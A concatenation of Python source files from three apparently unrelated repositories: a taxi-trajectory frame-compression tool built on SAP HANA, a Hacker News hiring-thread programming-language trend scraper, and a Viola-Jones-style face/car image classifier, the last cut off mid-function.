| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,134 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/test/test_frame_utils.py | import pytest
from frame.frame_utils import interpolate_missing_frames
from frame.models.frame import Frame
def test_interpolate_single_missing_frame():
    """A gap of one frame id yields exactly the midpoint frame."""
    result = interpolate_missing_frames(Frame(1, 1.00, 3.00), Frame(3, 2.00, 6.00))
    assert result == [Frame(2, 1.5, 4.5)]
def test_interpolate_multiple_missing_frames():
    """A four-id gap yields three evenly spaced interpolated frames."""
    result = interpolate_missing_frames(Frame(1, 1.00, 5.00), Frame(5, 5.00, 1.00))
    assert result == [Frame(2, 2.0, 4.0), Frame(3, 3.0, 3.0), Frame(4, 4.0, 2.0)]
def test_error_on_interpolating_subsequent_frames():
    """Adjacent frames have nothing to interpolate and must be rejected."""
    with pytest.raises(AssertionError):
        interpolate_missing_frames(Frame(1, 1.00, 5.00), Frame(2, 5.00, 1.00))
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,135 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/__main__.py | from frame.frame_utils import interpolate_missing_frames, group_frames, add_padding, delta_encode
from frame.models.frame_group import FrameGroup
from frame.models.sample import Sample
from frame.sample_utils import sample_with_highest_sed
from frame.sql.get_trajectories_shark import trajectories_in_group_range
from frame.sql_utils import read_sql
from frame.tracker import Tracker
from utils.hana_connector import HanaConnection
# Module-wide statistics collector, shared with create_frames().
tracker = Tracker()
def run():
"""Fetch every trajectory from HANA, build its frames and frame groups, then print processing statistics."""
with HanaConnection() as connection:
connection.execute(read_sql('./sql/trajectories.sql'))
trajectories = connection.fetchall()
# create_new_table(connection)
for trajectory_id in trajectories:
# trajectory_id is a one-element row tuple from fetchall().
connection.execute(read_sql("./sql/get_trajectory.sql").format(trajectory_id[0]))
trajectory = connection.fetchall()
frames = create_frames(trajectory)
frame_groups = create_frame_groups(trajectory_id[0], frames)
# insert_frame_groups(connection, frame_groups)
tracker.print()
def create_frames(trajectory):
"""Convert the ordered DB rows of one trajectory into a list of Frames: one frame per frame-id slot, SED-selected when several samples share a slot, and linearly interpolated across gaps."""
frames = []
current_frame_id = 0
samples_in_frame = []
for row in trajectory:
tracker.track_sample()
sample = Sample.from_row(row)
in_current_frame = sample.frame_id() == current_frame_id
# The sample starts a new slot: flush the previous slot's samples first.
if not in_current_frame:
if len(samples_in_frame) > 0:
# Create a frame from collected samples, uses SED if necessary
previous_frame = frames[-1] if len(frames) > 0 else samples_in_frame[0].to_frame()
following_frame = sample.to_frame()
selected_sample = sample_with_highest_sed(samples_in_frame, previous_frame, following_frame)
frames.append(selected_sample.to_frame())
tracker.track_frame(len(samples_in_frame))
samples_in_frame = []
# Interpolate missing frames
# (only for interior gaps: leading gaps have no previous frame).
if len(frames) > 0 and sample.frame_id() != current_frame_id + 1:
interpolated_frames = interpolate_missing_frames(frames[-1], sample.to_frame())
tracker.track_interpolated_frames(len(interpolated_frames))
frames = frames + interpolated_frames
current_frame_id = sample.frame_id()
samples_in_frame.append(sample)
# Flush pending samples
if len(samples_in_frame) > 0:
previous_frame = frames[-1] if len(frames) > 0 else samples_in_frame[0].to_frame()
following_frame = samples_in_frame[-1].to_frame()
selected_sample = sample_with_highest_sed(samples_in_frame, previous_frame, following_frame)
frames.append(selected_sample.to_frame())
return frames
def create_frame_groups(trajectory_id, frames):
"""Split frames into 30-frame groups and delta-encode each group against its first frame (the I-frame)."""
groups = group_frames(frames, 30)
frame_groups = []
for (group_id, trip_id, occupancy), frames in groups.items():
padded_frames = add_padding(frames, 30)
i_frame = None
p_frames = []
if len(padded_frames) > 0:
i_frame = padded_frames[0]
if len(padded_frames) > 1:
# Every frame after the I-frame is stored as an offset from it.
p_frames = [delta_encode(i_frame, frame) for frame in padded_frames[1:len(padded_frames)]]
frame_groups.append(FrameGroup(trajectory_id, group_id, trip_id, occupancy, i_frame, p_frames))
return frame_groups
def run_requests(begin_frame, begin_end, trajectory_id=None):
"""Run the decoded-trajectory query for group ids in [begin_frame, begin_end) and return all rows."""
with HanaConnection() as connection:
connection.execute(trajectories_in_group_range(begin_frame, begin_end, trajectory_id))
return connection.fetchall()
if __name__ == '__main__':
# run_requests(0, 1)
run()
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,136 | VolkerSchiewe/tuk_3 | refs/heads/master | /utils/hana_connector.py | import pyhdb
import socket
import logging
import os
SCHEMA = 'TAXI'
class HanaConnection(object):
    """Context manager yielding a cursor on the team's HANA instance.

    Credentials are read from the HANA_USER / HANA_PWD environment
    variables. Entering the context returns a cursor with the TAXI schema
    already selected; leaving it closes both cursor and connection.
    """

    def __init__(self):
        hana_user = os.environ.get('HANA_USER')
        hana_pwd = os.environ.get('HANA_PWD')
        # Bug fix: the original condition used `and`, so when only ONE of the
        # two credentials was missing no error was raised and the connection
        # attempt failed later inside pyhdb. Both variables are required.
        if not (hana_user and hana_pwd):
            raise EnvironmentError('Please provide user and password as environment variables (HANA_USER, HANA_PWD)!')
        try:
            self.connection = pyhdb.Connection(
                host="side.eaalab.hpi.uni-potsdam.de",
                port=30015,
                user=hana_user,
                password=hana_pwd,
                autocommit=True,
                timeout=None
            )
            self.connection.connect()
            self.cursor = self.connection.cursor()
            self.cursor.execute('SET SCHEMA {}'.format(SCHEMA))
        except socket.gaierror as e:
            # Host name could not be resolved -- typically no network/VPN.
            logging.error('Database instance is not available!')
            raise e

    def __enter__(self):
        return self.cursor

    def __exit__(self, exc_type, exc_value, traceback):
        if exc_type is not None:
            logging.error(exc_type, exc_value, traceback)
        self.cursor.close()
        self.connection.close()
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,137 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/models/sample.py | import datetime
from frame.models.frame import Frame
class Sample:
    """A single timestamped GPS reading of a taxi trajectory."""

    def __init__(self, timestamp: datetime.datetime, x: float, y: float, speed: int, occupancy: int):
        self.timestamp = timestamp
        self.x = x
        self.y = y
        self.speed = speed
        self.occupancy = occupancy

    @classmethod
    def from_row(cls, row):
        """Build a Sample from a database result row
        (row layout: [_, timestamp, x, y, occupancy, speed])."""
        return Sample(row[1], row[2], row[3], row[5], row[4])

    def to_frame(self):
        """Project this sample onto its 30-second frame."""
        return Frame(self.frame_id(), self.x, self.y, self.occupancy)

    def frame_id(self):
        """Index of this sample's 30-second slot within the day."""
        t = self.timestamp
        return 120 * t.hour + 2 * t.minute + t.second // 30

    def __eq__(self, other):
        """Samples compare equal iff all attributes match."""
        if isinstance(self, other.__class__):
            return self.__dict__ == other.__dict__
        return False
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,138 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sample_utils.py | import numpy as np
def sample_with_highest_sed(samples, previous_frame, following_frame):
    """Return the sample with the largest synchronized Euclidean distance.

    Each sample's position is compared against the position linearly
    interpolated (keyed by second-of-minute over the domain (0, 15)) between
    the previous and following frame; the sample deviating the most from
    that prediction is returned.

    NOTE(review): the interpolation domain is (0, 15) although frames
    elsewhere span 30 seconds -- confirm this is intended.
    """
    seconds = [s.timestamp.second for s in samples]
    pred_lon = np.interp(seconds, (0, 15), (previous_frame.x, following_frame.x))
    pred_lat = np.interp(seconds, (0, 15), (previous_frame.y, following_frame.y))
    best, best_sed = None, -1
    for lat, lon, sample in zip(pred_lat, pred_lon, samples):
        # Inlined Euclidean distance (identical expression to the module's
        # _euclidean_distance helper).
        sed = np.sqrt(np.square(sample.x - lat) + np.square(sample.y - lon))
        if sed > best_sed:
            best_sed, best = sed, sample
    return best
def _euclidean_distance(px, py, qx, qy):
return np.sqrt(np.square(qx - px) + np.square(qy - py))
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,139 | shun-liang/hnhiringtrend | refs/heads/master | /main.py | import json
import pandas as pd
import re
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import requests
from bs4 import BeautifulSoup
# Number of worker threads used when fetching/analyzing job posts.
THREAD_POOL_SIZE = 15

# Language vocabulary: single-word names matched per token, multi-word names
# matched as substrings, plus aliases mapping alternate spellings to a
# canonical name.
with open('skills.json') as SKILLS_FILE:
    SKILLS_JSON = json.load(SKILLS_FILE)
SINGLE_WORD_LANGUAGES = SKILLS_JSON['single_word_languages']
MULTIPLE_WORD_LANGUAGES = SKILLS_JSON['multiple_word_languages']
ALIASES = SKILLS_JSON['aliases']

# Cached scrape results keyed by thread unix time; starts empty on first run.
# NOTE(review): these cache files are opened 'r+' although they are only read.
try:
    with open('language_matches.json', 'r+') as language_matches_file:
        UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT = json.load(language_matches_file)
except FileNotFoundError:
    UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT = {}

# Ids of threads from past months that are fully scraped and can be skipped.
try:
    with open('checked_posts.json', 'r+') as checked_posts_file:
        checked_posts = set(json.load(checked_posts_file)['checked_posts'])
except FileNotFoundError:
    checked_posts = set({})

# Per-thread job-post totals (keyed by thread unix time).
try:
    with open('total_posts.json', 'r+') as total_posts_file:
        total_posts = json.load(total_posts_file)['total_posts']
        total_posts_json = {'total_posts': total_posts}
except FileNotFoundError:
    total_posts = {}
    total_posts_json = {'total_posts': total_posts}

# Manual overrides: 'pointers' redirects one thread id to another,
# 'non_job_post' lists root posts that are not hiring threads.
with open('posts.json') as posts_file:
    POSTS_JSON = json.load(posts_file)
JOB_POST_POINTERS = POSTS_JSON['pointers']
NON_JOB_POSTS = POSTS_JSON['non_job_post']

# Token pattern keeps symbols that appear in language names (C++, C#, ...).
SPLIT_PATTERN = r'[\w\'\|\-\+#&’]+'
# URLs and email addresses are stripped from posts before matching.
URL_PATTERN = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
EMAIL_PATTERN = r'[\w.-]+@[\w.-]+'
def scrape_jobs(root_post_id):
    """Scrape one monthly 'Who is hiring?' thread.

    Fetches the root post, then analyzes all of its child job posts in a
    thread pool, appending each post id to the per-language lists inside
    UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT. Results accumulate in the
    module-level caches (total_posts, checked_posts) which main() persists.
    Returns None in all cases.
    """
    # Apply manual redirects and skip known non-hiring posts.
    if str(root_post_id) in JOB_POST_POINTERS:
        root_post_id = JOB_POST_POINTERS[str(root_post_id)]
    if root_post_id in NON_JOB_POSTS:
        print('%s is not a job post' % root_post_id)
        return None
    if root_post_id in checked_posts:
        print('post %s already scraped' % root_post_id)
        return None
    root_post_request = requests.get('https://hacker-news.firebaseio.com/v0/item/%s.json' %
                                     str(root_post_id))
    root_post_json = root_post_request.json()
    if 'time' not in root_post_json:
        print('time attribute not in post %s' % root_post_id)
        return None
    unix_time = root_post_json['time']
    unix_time_str = str(unix_time)
    post_datetime = datetime.fromtimestamp(unix_time)
    if 'title' in root_post_json:
        root_post_title = root_post_json['title']
        # Only process actual hiring threads (whoishiring also posts
        # "freelancer" / "who wants to be hired" threads).
        if "hiring" in root_post_title.lower():
            print('%s: %s' % (root_post_title, root_post_request.url))
            job_post_ids = root_post_json['kids']
            total_posts[unix_time_str] = len(job_post_ids)
            futures = []
            executor = ThreadPoolExecutor(max_workers=THREAD_POOL_SIZE)
            # Reuse the cached per-language dict for this month if present.
            if unix_time_str in UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT:
                programming_languages_dict = UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT[unix_time_str]
            else:
                programming_languages_dict = {lang: [] for lang in
                                              SINGLE_WORD_LANGUAGES + MULTIPLE_WORD_LANGUAGES}
                UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT[unix_time_str] = programming_languages_dict
            # Posts already recorded for any language don't need re-fetching.
            existing_posts = frozenset([post for posts in programming_languages_dict.values() for post in posts])
            for job_post_id in job_post_ids:
                if job_post_id not in existing_posts:
                    task_future = executor.submit(_fetch_and_analyze, job_post_id, programming_languages_dict)
                    futures.append(task_future)
                # else:
                #     print('job post %s already scraped.' % job_post_id)
            # Block until all worker tasks finish (also surfaces exceptions).
            for task_future in futures:
                task_future.result()
    else:
        print('Can\'t get attribute \'title\' from root post %s' % root_post_request.url)
    # Threads from past months can never gain new posts -> mark as done.
    now = datetime.now()
    if post_datetime.month != now.month or post_datetime.year != now.year:
        checked_posts.add(root_post_id)
def show_jobs(job_post_id_list):
    """Print the raw text of every job post id in the given list."""
    for post_id in job_post_id_list:
        print(_get_job_post_text(post_id))
def main():
    """Scrape all whoishiring threads, then persist every cache to disk.

    Writes both .json files (reloaded on the next run) and .jsonp files
    (JavaScript variable assignments consumed by the front end).
    """
    for root_post in get_all_whoishring_root_posts():
        scrape_jobs(root_post)
    with open('language_matches.json', 'w') as language_matches_file:
        json.dump(UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT, language_matches_file, indent=2)
    with open('language_matches.jsonp', 'w') as language_matches_jsonp_file:
        language_matches_jsonp_file.write('var languages_matches = %s' % json.dumps(UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT))
    with open('checked_posts.json', 'w') as checked_posts_json_file:
        checked_posts_json = {'checked_posts': list(checked_posts)}
        json.dump(checked_posts_json, checked_posts_json_file, indent=2)
    with open('total_posts.json', 'w') as total_posts_json_file:
        json.dump(total_posts_json, total_posts_json_file, indent=2)
    with open('total_posts.jsonp', 'w') as total_posts_jsonp_file:
        total_posts_jsonp_file.write('var total_posts = %s' % json.dumps(total_posts_json))
def get_all_whoishring_root_posts():
    """Return ids of all posts submitted by the HN hiring accounts.

    Queries both the 'whoishiring' and '_whoishiring' accounts and
    concatenates their submission lists.
    """
    # Bug fix: start from an empty list so a failed first request no longer
    # leaves `root_posts` unbound (NameError on the += / return below).
    root_posts = []
    user_request = requests.get('https://hacker-news.firebaseio.com/v0/user/whoishiring.json')
    if user_request.status_code == 200:
        root_posts = user_request.json()['submitted']
    user_request = requests.get('https://hacker-news.firebaseio.com/v0/user/_whoishiring.json')
    if user_request.status_code == 200:
        root_posts += user_request.json()['submitted']
    print('root_posts: %s' % root_posts)
    return root_posts
def reduce_all_language_matches():
    """Merge the per-month language match dicts into one combined dict."""
    merged = {lang: [] for lang in SINGLE_WORD_LANGUAGES + MULTIPLE_WORD_LANGUAGES}
    for lang_dict in UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT.values():
        for lang, posts in lang_dict.items():
            merged[lang] += posts
    return merged
def _get_job_post_text(job_post_id):
    """Fetch a single job post from the HN API and return its raw text.

    Returns None (after printing a diagnostic) when the request fails, the
    item is null, or it carries no 'text' attribute.
    """
    response = requests.get('https://hacker-news.firebaseio.com/v0/item/%s.json' %
                            job_post_id)
    if response.status_code != 200:
        print('Can\'t retrive job post %s, HTTP response code: %s' %
              (job_post_id, response.status_code))
        return None
    payload = response.json()
    if not payload:
        print('Can\'t get json of job post %s, job_post_json is null' % job_post_id)
        return None
    if 'text' in payload:
        return payload['text']
    return None
def _fetch_and_analyze(job_post_id, programming_languages_dict):
    """Fetch one job post and record every language it mentions.

    Strips HTML, URLs and email addresses from the post, then matches
    single-word languages (and aliases) per token and multi-word languages
    as substrings, appending job_post_id to each matched language's list in
    programming_languages_dict. Runs inside the thread pool.
    """
    job_post_text = _get_job_post_text(job_post_id)
    if job_post_text:
        # Convert HTML to plain text, then remove URLs/emails which would
        # otherwise produce spurious token matches.
        job_post_text = BeautifulSoup(job_post_text, 'html.parser').get_text(separator=' ')
        job_post_text = re.sub('%s|%s' % (URL_PATTERN, EMAIL_PATTERN), '', job_post_text)
        words = re.findall(SPLIT_PATTERN, job_post_text)
        single_word_languages_set = set({})
        multiple_word_languages_set = set({})
        for word in words:
            if word in SINGLE_WORD_LANGUAGES:
                single_word_languages_set.add(word)
            # Aliases map alternate spellings to their canonical name.
            if word in ALIASES:
                single_word_languages_set.add(ALIASES[word])
        # Multi-word names can't be token-matched; use substring search.
        for lang in MULTIPLE_WORD_LANGUAGES:
            if lang in job_post_text:
                multiple_word_languages_set.add(lang)
        for lang in single_word_languages_set |\
                multiple_word_languages_set:
            programming_languages_dict[lang].append(job_post_id)
# Script entry point: scrape all hiring threads and persist the caches.
if __name__ == '__main__':
    main()
| {"/hn_posts/test_job_post.py": ["/hn_posts/job_post.py"]} |
78,140 | shun-liang/hnhiringtrend | refs/heads/master | /hn_posts/test_job_post.py | import json
from .job_post import JobPost
class TestJobPost(object):
    '''Unit test for JobPost class
    '''
    # Fixture: a real hiring-thread post mentioning single-word languages
    # (e.g. "Python") used to exercise token matching.
    example_text_single_word = '''
Redwood City
Numenta (http://www.numenta.com) is developing technology modeled on the neocortex. Get in on the ground floor of what, we think, is already groundbreaking
machine intelligence.
Senior devs with a passion for stellar, simple, usable design wanted. Experience with Python would be great but if you bring a deep skillset in a web stack
of your choice then our team is always open to new ideas!
Numenta is prepared to take on the world, and has the technology and experienced leadership to do it.
Apply here (resume-eng at numenta dot com) or contact me through info in my profile for questions.
P.S. Paid intern opportunities for the fall are open as well!
Other keywords for page searchers: AI, Machine learning, front-end
'''
    # Fixture: a post using alias spellings (e.g. "python", "javascript").
    example_text_alias = '''
Palo Alto, CA; Washington, DC (full-time preferred, part-time possible if you're an expert)
REMOTE ONLY for now, but it'd be great if you were local -- we're building out a long-term team and will be setting up an office in the coming months.
I'm with a 5-person team working on a real-time web + mobile application. We just finished a prototype, raised some seed money, and are headed for
greatness. Hopefully. This is a chance to work on some architecture from the outset of the product. I'd prefer those who have a possibility of coming on
long-term as I build out the team, most likely around Palo Alto, but do have immediate needs that lead me to consider splitting up short-term chunks of
development for freelancers. In any case, we're distributed for now so remote is the only possibility.
backend: postgres, python, django, gevent + gunicorn
frontend: coffeescript, jQuery, backbone.js, socket.io, modernizr, compass
I'm looking for:
1. Advanced web jacks-of-many-trades. You know a lot about several things from above and have at least tried your hand at a demo app using the rest.
Backend/frontend/deployment.
2. A specialized front-end dev who knows their javascript in-and-out. We're designing a single page architecture for the most part. Mobile browser
experience would be good.
3. Mobile app developers (native iPhone & Android, though we're considering phonegap as well to get something out there faster).
We're staying distributed for now -- I'm based in Palo Alto but spend a fair amount of time with some of the team in DC as well.
gmail - davidmarble
'''

    def test_match_programming_language(self):
        # Load the real vocabulary file used by the scraper.
        with open('./skills.json') as SKILLS_FILE:
            SKILLS_JSON = json.load(SKILLS_FILE)
        SINGLE_WORD_LANGUAGES = SKILLS_JSON['single_word_languages']
        # NOTE(review): the next two values are currently unused by this test.
        MULTIPLE_WORD_LANGUAGES = SKILLS_JSON['multiple_word_languages']
        ALIASES = SKILLS_JSON['aliases']
        job_post = JobPost(self.example_text_single_word)
        job_post.match_single_word_languages(SINGLE_WORD_LANGUAGES)
        # The fixture mentions Python but never C++.
        assert 'Python' in job_post.matched_languages
        assert 'C++' not in job_post.matched_languages
| {"/hn_posts/test_job_post.py": ["/hn_posts/job_post.py"]} |
78,141 | shun-liang/hnhiringtrend | refs/heads/master | /hn_posts/job_post.py | import re
class JobPost(object):
    ''' A job post scraped from Hacker News
    '''
    # Tokens may contain word characters plus symbols that occur in language
    # names (C++, C#, F#, ...).
    SPLIT_PATTERN = r'[\w\'\|\-\+#&’]+'

    def __init__(self, text):
        self.text = text
        self.words = re.findall(self.SPLIT_PATTERN, text) if text else []
        self.matched_languages = set({})

    def match_single_word_languages(self, langs):
        """Record every token of this post that appears in `langs`."""
        self.matched_languages.update(w for w in self.words if w in langs)
| {"/hn_posts/test_job_post.py": ["/hn_posts/job_post.py"]} |
78,142 | ynsa/face_detector | refs/heads/master | /applicator.py | #!/usr/bin/env python3
import pickle
import warnings
import numpy as np
from sklearn.externals._pilutil import imread
import sys
from learner import generate_vj_features, WeakClassifier
# Silence all warnings globally so script output stays clean.
warnings.filterwarnings('ignore')
def read_file(fname):
    """Load a 26x40 RGB image and return its first channel as a 2-D array."""
    image = imread(fname)
    # The classifier expects exactly this input geometry.
    assert image.shape == (26, 40, 3)
    return image[:, :, 0]
def load_model(model_file):
    """Deserialize a pickled model (list of (classifier, alpha) pairs)."""
    with open(model_file, 'rb') as fh:
        return pickle.load(fh)
def predict(model, features):
    """Weighted-vote prediction of the boosted ensemble.

    Each (classifier, alpha) pair contributes alpha * classifier.predict on
    its feature column; the sign of the total is returned (+1/-1, 0 on tie).
    """
    score = sum(alpha * clf.predict(features[clf.i]) for clf, alpha in model)
    return int(np.sign(score))
def main(fname, model_file='my.model'):
    """Classify one image file: prints 1 for the positive class, else 0."""
    features = generate_vj_features(read_file(fname))
    prediction = predict(load_model(model_file), features)
    print(int(prediction == 1))
# NOTE(review): these lines also run at import time; consider an
# `if __name__ == '__main__':` guard. Usage: python applicator.py MODEL IMAGE
model = sys.argv[-2]
fname = sys.argv[-1]
main(fname, model)
| {"/applicator.py": ["/learner.py"]} |
78,143 | ynsa/face_detector | refs/heads/master | /learner.py | import math
import os
import pickle
import sys
import timeit
import warnings
import numpy as np
from sklearn.externals._pilutil import imread
# Silence all warnings globally so training output stays clean.
warnings.filterwarnings('ignore')
def integral_image(image, h=26, w=40):
    """Compute the summed-area (integral) table of an h x w image.

    result[i][j] equals the sum of image[:i+1, :j+1]. A zero border row and
    column simplify the recurrence and are stripped before returning, so the
    output has the same (h, w) shape as the input.

    Bug fix: the loops previously stopped at range(1, h) / range(1, w), so
    the table's last row and last column were never accumulated and still
    held raw pixel values.
    """
    padded = np.zeros((h + 1, w + 1))
    padded[1:, 1:] = image
    for i in range(1, h + 1):
        for j in range(1, w + 1):
            # I[i][j] = pixel + left + above - upper-left (all already final).
            padded[i][j] += padded[i][j - 1] + padded[i - 1][j] - padded[i - 1][j - 1]
    return padded[1:, 1:]
def read_file(filename) -> np.array:
    """Load one 26x40 training image and return integral images of the
    original plus two mirrored augmentations.

    Returns [integral(original), integral(fliplr), integral(flipud)].

    Bug fix: the original put the RAW image in the first slot while the two
    flipped entries were integral images, so downstream feature extraction
    received inconsistent representations for the same sample.
    """
    image = np.array(imread(filename))
    assert image.shape == (26, 40, 3)
    image = image[:, :, 0]
    integral_img = integral_image(image)
    assert integral_img.shape == (26, 40)
    images = [integral_img]
    # Augment with horizontal and vertical flips to triple the sample count.
    images.append(integral_image(np.fliplr(image)))
    images.append(integral_image(np.flipud(image)))
    return images
def get_s(folder):
    """Load the training set from `folder`.

    Expects `folder` to contain 'cars' (negative class, label -1) and
    'faces' (positive class, label +1) subdirectories. Each file yields a
    feature vector plus feature vectors for its flipped augmentations; the
    augmented entries are appended after all originals, so the first
    `base_n` samples correspond to real (non-augmented) images.

    Returns (base_n, y, features).
    """
    base_n = 0  # number of original (non-augmented) files
    y = []
    features = []
    flipped_y = []
    flipped_features = []
    for filename in os.listdir(os.path.join(folder, 'cars')):
        name = os.path.join(folder, 'cars', filename)
        # read_file returns the original integral image plus flipped variants.
        integral_img, *flipped = read_file(name)
        y.append(-1)
        features.append(generate_vj_features(integral_img))
        for fl in flipped:
            flipped_y.append(-1)
            flipped_features.append(generate_vj_features(fl))
        base_n += 1
    for filename in os.listdir(os.path.join(folder, 'faces')):
        name = os.path.join(folder, 'faces', filename)
        integral_img, *flipped = read_file(name)
        y.append(1)
        features.append(generate_vj_features(integral_img))
        for fl in flipped:
            flipped_y.append(1)
            flipped_features.append(generate_vj_features(fl))
        base_n += 1
    # Augmented samples go after the originals (see docstring).
    y.extend(flipped_y)
    features.extend(flipped_features)
    return base_n, y, features
def generate_vj_features(integral_img):
    """Compute Viola-Jones-style rectangle features from an integral image.

    Scans rectangle sizes (>= 5x5) and positions (stride 10) and, for each
    placement, emits adjacent-rectangle contrast features (sum of 'positive'
    rectangles minus sum of 'negative' ones): horizontal and vertical
    two-rectangle, horizontal three-rectangle, and four-rectangle patterns.
    """
    def rect_sum(x, y, w, h):
        # Pixel sum of the w*h rectangle at (x, y) via 4-corner lookup.
